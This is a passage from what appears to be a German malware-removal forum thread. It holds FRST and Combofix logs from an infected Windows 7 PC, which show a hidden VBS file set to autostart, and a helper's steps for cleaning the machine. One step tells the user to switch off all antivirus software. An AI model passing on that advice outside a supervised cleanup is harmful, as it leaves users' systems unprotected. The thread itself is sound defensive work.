Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2468871) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2533523) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2600217) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft Access 2010 (KB2553446) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{FEF4C57D-0975-4D3C-ACC7-DCD038C3788F}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2837594) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{99A0DB9A-71FC-4F98-BC1F-78A18195C677}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DB0B0CDF-77EC-47B0-94E2-4738573A1E58}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817396) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{1AA82E2E-7DB7-4C70-910C-BBB657A6B3A5}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{79C725A1-3964-421C-A528-78C1C083C7C7}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{EBD18DE5-BC84-4B57-9A30-097044871F9A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{B6AD7E27-012A-4B63-82BA-AF62893E5435}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{07DC9C6C-E916-4F42-8677-716930ED0393}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825640) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{43F59F4D-7179-497E-BE99-BC6F7D1DDCBA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825640) 64-Bit Edition (HKLM\...\{90140000-0044-0407-1000-0000000FF1CE}_Office14.PROPLUS_{43F59F4D-7179-497E-BE99-BC6F7D1DDCBA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 64-Bit Edition (HKLM\...\{90140000-001F-0407-1000-0000000FF1CE}_Office14.PROPLUS_{64D96F30-CF4C-4CCE-AAF2-F8909348BF35}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 64-Bit Edition (HKLM\...\{90140000-001F-040C-1000-0000000FF1CE}_Office14.PROPLUS_{9F6507AC-7D8F-46C1-B90F-59C7828E0E0D}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2863818) 64-Bit Edition (HKLM\...\{90140000-001F-0409-1000-0000000FF1CE}_Office14.PROPLUS_{A9C4BE58-07E0-473D-AE68-ECBA13FBF77E}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878225) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{8A6BDA63-4D23-4485-A466-8979E10BCF49}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878225) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{8A6BDA63-4D23-4485-A466-8979E10BCF49}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DDDC32A5-9528-4771-B91A-97A8E1D7957B}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{90140000-001A-0407-1000-0000000FF1CE}_Office14.PROPLUS_{6164E0E5-C903-488C-93AF-1B7AF7EBC331}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2553145) 64-Bit Edition (HKLM\...\{90140000-0018-0407-1000-0000000FF1CE}_Office14.PROPLUS_{BEA3259E-14B5-4D89-87FF-ED9F1D0D81C8}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2775360) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{BE1D254A-E5CD-4E76-9BE8-7B2E5FDBA6AF}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUS_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2810066) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DF33B92A-5381-4F03-AB54-2D67086B357E}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2837593) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{A82E26EF-680E-427D-B7D0-FD7997DDC217}) (Version:  - Microsoft)
VLC media player 2.0.6 (HKLM\...\VLC media player) (Version: 2.0.6 - VideoLAN)
VR-NetWorld (HKLM-x32\...\{8815F011-43AF-4F50-BBD8-D78ED3D6F5B9}) (Version:  - )
Windows Live Communications Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4311.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
WinRAR 4.20 (32-Bit) (HKLM-x32\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)

==================== Restore Points  =========================

04-03-2014 03:23:52 Windows Update
04-03-2014 12:08:17 Windows Live Essentials
04-03-2014 12:11:06 Windows Update
04-03-2014 12:13:06 Windows Update
04-03-2014 12:13:55 DirectX wurde installiert
04-03-2014 12:14:27 DirectX wurde installiert
04-03-2014 12:15:14 DirectX wurde installiert
04-03-2014 12:16:48 WLSetup
14-03-2014 02:00:37 Windows Update
23-03-2014 22:56:32 Geplanter Prüfpunkt

==================== Hosts content: ==========================

2009-07-14 04:34 - 2014-02-25 18:48 - 00000853 ____N C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

Task: {1F2FE24C-4B0D-45D4-8B60-A98B45D048CA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16] (Google Inc.)
Task: {5ADA0D06-B2AE-41FA-B409-CCC39DFB0EF2} - System32\Tasks\{95AAC210-9BFE-40A9-AF62-1A23A8FF05C6} => Chrome.exe hxxp://ui.skype.com/ui/0/4.1.0.179.367/de/abandoninstall?source=lightinstaller&amp;page=tsProblems&amp;LastError=404&amp;installinfo=google-toolbar:notoffered;notincluded,google-chrome:notoffered;notincluded
Task: {A375B6A6-9D4A-471F-A303-95C4CA7AD0FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {BBBBFC89-6720-42F2-9EB0-F18DE5DD0B9E} - System32\Tasks\{1035BE4D-F19C-4FDC-9E19-49D3A845A3FF} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=4.1.0.179.367&amp;LastError=404
Task: {E072B638-8F77-4687-8C9B-4EA80C5B4038} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16] (Google Inc.)
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2011-03-21 16:19 - 2011-03-21 16:19 - 00053248 _____ () C:\Program Files\NetLimiter 3\nlsvcPS.dll
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2013-04-16 21:32 - 2011-10-26 17:41 - 00318976 _____ () C:\Program Files\TeraCopy\TeraCopyExt64.dll
2013-04-16 21:32 - 2011-10-26 17:41 - 00126464 _____ () C:\Program Files\TeraCopy\TeraCopy64.dll
2010-03-26 10:41 - 2010-03-26 10:41 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2013-04-16 20:01 - 2013-04-16 20:01 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2013-04-16 21:58 - 2013-04-16 21:58 - 00397704 _____ () C:\Program Files (x86)\Avira\AntiVir Desktop\sqlite3.dll
2014-02-12 21:58 - 2014-02-12 21:58 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-02-12 21:58 - 2014-02-12 21:58 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2010-03-09 02:18 - 2010-03-09 02:18 - 00465576 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\sqlite3.dll
2010-03-09 02:13 - 2010-03-09 02:13 - 01081600 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\ACE.dll
2013-04-17 04:50 - 2009-05-21 00:02 - 00072200 _____ () C:\Program Files (x86)\Launch Manager\CdDirIo.dll
2014-02-12 21:58 - 2014-02-12 21:58 - 00237384 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2014-04-02 08:03 - 2014-03-15 02:50 - 00051016 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\chrome_elf.dll
2014-04-02 08:03 - 2014-03-15 02:50 - 00716616 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\libglesv2.dll
2014-04-02 08:03 - 2014-03-15 02:50 - 00100168 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\libegl.dll
2014-04-02 08:03 - 2014-03-15 02:50 - 04061000 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll
2014-04-02 08:03 - 2014-03-15 02:50 - 00394568 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll
2014-04-02 08:03 - 2014-03-15 02:50 - 01647432 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ffmpegsumo.dll

==================== Alternate Data Streams (whitelisted) =========


==================== Safe Mode (whitelisted) ===================


==================== Disabled items from MSCONFIG ==============

MSCONFIG\startupfolder: C:^Users^Franz^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Franz^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Tintenwarnungen überwachen - HP Officejet 4620 series (Netzwerk).lnk => C:\Windows\pss\Tintenwarnungen überwachen - HP Officejet 4620 series (Netzwerk).lnk.Startup
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: HP Officejet 4620 series (NET) => "C:\Program Files\HP\HP Officejet 4620 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN298240ZB05S1:NW" -scfn "HP Officejet 4620 series (NET)" -AutoStart 1

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (04/14/2014 10:31:23 AM) (Source: Application Hang) (User: )
Description: Programm VRNetWorld.exe, Version 5.1.0.12 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: fe0

Startzeit: 01cf57ba07163d71

Endzeit: 0

Anwendungspfad: C:\Program Files (x86)\VR-NetWorld\VRNetWorld.exe

Berichts-ID: 7c160182-c3ae-11e3-b796-00262dac37ec

Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25252272

Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25252272

Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25251258

Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25251258

Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25250244

Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25250244

Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second


System errors:
=============
Error: (04/14/2014 10:43:16 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:43:16 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:38:47 AM) (Source: Disk) (User: )
Description: Der Treiber hat einen Controllerfehler auf \Device\Harddisk1\DR1 gefunden.

Error: (04/14/2014 10:38:44 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:38:32 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:38:30 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:38:30 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:38:30 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:38:28 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (04/14/2014 10:38:27 AM) (Source: Microsoft-Windows-DNS-Client) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.


Microsoft Office Sessions:
=========================
Error: (04/14/2014 10:31:23 AM) (Source: Application Hang)(User: )
Description: VRNetWorld.exe5.1.0.12fe001cf57ba07163d710C:\Program Files (x86)\VR-NetWorld\VRNetWorld.exe7c160182-c3ae-11e3-b796-00262dac37ec

Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25252272

Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25252272

Error: (04/14/2014 10:15:19 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25251258

Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25251258

Error: (04/14/2014 10:15:18 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 25250244

Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: m->NextScheduledEvent 25250244

Error: (04/14/2014 10:15:17 AM) (Source: Bonjour Service)(User: )
Description: Task Scheduling Error: Continuously busy for more than a second


CodeIntegrity Errors:
===================================
  Date: 2014-03-05 15:59:48.934
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-03-01 13:30:45.600
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-03-01 13:30:33.518
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-03-01 13:25:21.861
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-03-01 12:27:05.166
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-02-28 14:14:30.022
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-02-28 14:14:25.270
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Memory info ===========================

Percentage of memory in use: 51%
Total physical RAM: 3764.43 MB
Available physical RAM: 1835.11 MB
Total Pagefile: 7526.99 MB
Available Pagefile: 4673.9 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB

==================== Drives ================================

Drive c: (ACER) (Fixed) (Total:452.97 GB) (Free:30.45 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 466 GB) (Disk ID: 59D459D4)
Partition 1: (Not Active) - (Size=13 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=453 GB) - (Type=07 NTFS)

==================== End Of Log ============================


schrauber 15.04.2014 10:29

Sticks anklemmen, nicht mehr abmachen.


Panda USB Vaccine - Download - Filepony
Das laufen lassen zum Absichern des Sticks.




Scan mit Combofix
WARNUNG an die MITLESER:
Combofix sollte ausschließlich ausgeführt werden, wenn dies von einem Teammitglied angewiesen wurde!

Downloade dir bitte Combofix vom folgenden Downloadspiegel: Link
  • WICHTIG: Speichere Combofix auf deinem Desktop.
  • Deaktiviere bitte alle deine Antivirensoftware sowie Malware/Spyware Scanner. Diese können Combofix bei der Arbeit stören. Combofix meckert auch manchmal trotzdem noch, das kannst du dann ignorieren, mir aber bitte mitteilen.
  • Starte die Combofix.exe und folge den Anweisungen auf dem Bildschirm.
  • Während Combofix läuft bitte nicht am Computer arbeiten, die Maus bewegen oder ins Combofixfenster klicken!
  • Wenn Combofix fertig ist, wird es ein Logfile erstellen.
  • Bitte poste die C:\Combofix.txt in deiner nächsten Antwort (möglichst in CODE-Tags).
Hinweis: Solltest du nach dem Neustart folgende Fehlermeldung erhalten
Es wurde versucht, einen Registrierungsschlüssel einem ungültigen Vorgang zu unterziehen, der zum Löschen markiert wurde.
starte den Rechner einfach neu. Dies sollte das Problem beheben.


fxak 16.04.2014 08:41

combofix.txt:

Code:

ComboFix 14-04-12.01 - Franz 16.04.2014  2:59.1.4 - x64
Microsoft Windows 7 Home Premium  6.1.7600.0.1252.49.1031.18.3764.1845 [GMT 2:00]
ausgeführt von:: c:\users\Franz\Desktop\ComboFix.exe
AV: Avira Desktop *Disabled/Outdated* {4D041356-F94D-285F-8768-AAE50FA36859}
SP: Avira Desktop *Disabled/Outdated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Neuer Wiederherstellungspunkt wurde erstellt
.
.
((((((((((((((((((((((((((((((((((((  Weitere Löschungen  ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Franz\AppData\Local\Microsoft\Windows\Temporary Internet Files\{4270F4AC-2AD7-488D-8E81-BDC8F71DD41B}.xps
c:\windows\Temp\log.txt
c:\windows\wininit.ini
.
.
(((((((((((((((((((((((  Dateien erstellt von 2014-03-16 bis 2014-04-16  ))))))))))))))))))))))))))))))
.
.
2014-04-16 01:14 . 2014-04-16 01:14        --------        d-----w-        c:\users\Default\AppData\Local\temp
2014-04-16 00:52 . 2014-04-16 00:52        --------        d-----w-        c:\programdata\Panda Security
2014-04-16 00:52 . 2014-04-16 00:52        --------        d-----w-        c:\program files (x86)\Panda USB Vaccine
2014-04-14 08:43 . 2014-04-14 08:45        --------        d-----w-        C:\FRST
2014-04-07 07:32 . 2014-04-09 08:19        --------        d-----w-        C:\[Smad-Cage]
2014-04-07 07:30 . 2014-04-07 07:30        --------        d-----w-        c:\programdata\Kaspersky Lab Setup Files
2014-04-02 06:19 . 2014-04-02 06:54        --------        d-----w-        c:\users\Franz\AppData\Local\NPE
2014-04-02 06:19 . 2014-04-02 06:19        --------        d-----w-        c:\programdata\Norton
2014-04-01 02:51 . 2013-09-22 15:47        73266        --sha-w-        c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
2014-04-01 02:51 . 2013-09-22 15:47        73266        ----a-w-        c:\users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-03-25 07:40 . 2014-03-25 07:40        --------        d-----w-        C:\found.001
2014-03-21 05:44 . 2014-03-23 23:36        --------        d-----w-        c:\users\Franz\AppData\Local\Microsoft Games
.
.
.
((((((((((((((((((((((((((((((((((((  Find3M Bericht  ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-04 12:17 . 2012-07-17 13:37        22240        ----a-w-        c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
.
.
((((((((((((((((((((((((((((  Autostartpunkte der Registrierung  ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt.
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetLimiter"="c:\program files\NetLimiter 3\NLClientApp.exe" [2011-03-21 2910208]
"wtbchkxbde"="wscript.exe" [2009-07-14 141824]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"BackupManagerTray"="c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe" [2010-03-08 260608]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2010-04-21 98304]
"LManager"="c:\program files (x86)\Launch Manager\LManager.exe" [2010-05-26 960080]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-02-12 43848]
"avgnt"="c:\program files (x86)\Avira\AntiVir Desktop\avgnt.exe" [2014-02-20 689744]
"HP Software Update"="c:\program files (x86)\Hp\HP Software Update\HPWuSchd2.exe" [2011-10-28 49208]
